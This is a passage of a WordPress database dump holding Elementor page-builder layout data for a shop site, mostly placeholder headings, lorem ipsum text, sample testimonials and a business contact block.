Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8782,1517,'_elementor_page_assets','a:0:{}'),(8784,1518,'_elementor_edit_mode','builder'),(8785,1518,'_elementor_template_type','wp-page'),(8786,1518,'_elementor_version','3.7.8'),(8787,1518,'_wp_page_template','elementor_canvas'),(8788,1518,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":88.899000000000001,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":11.054},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John 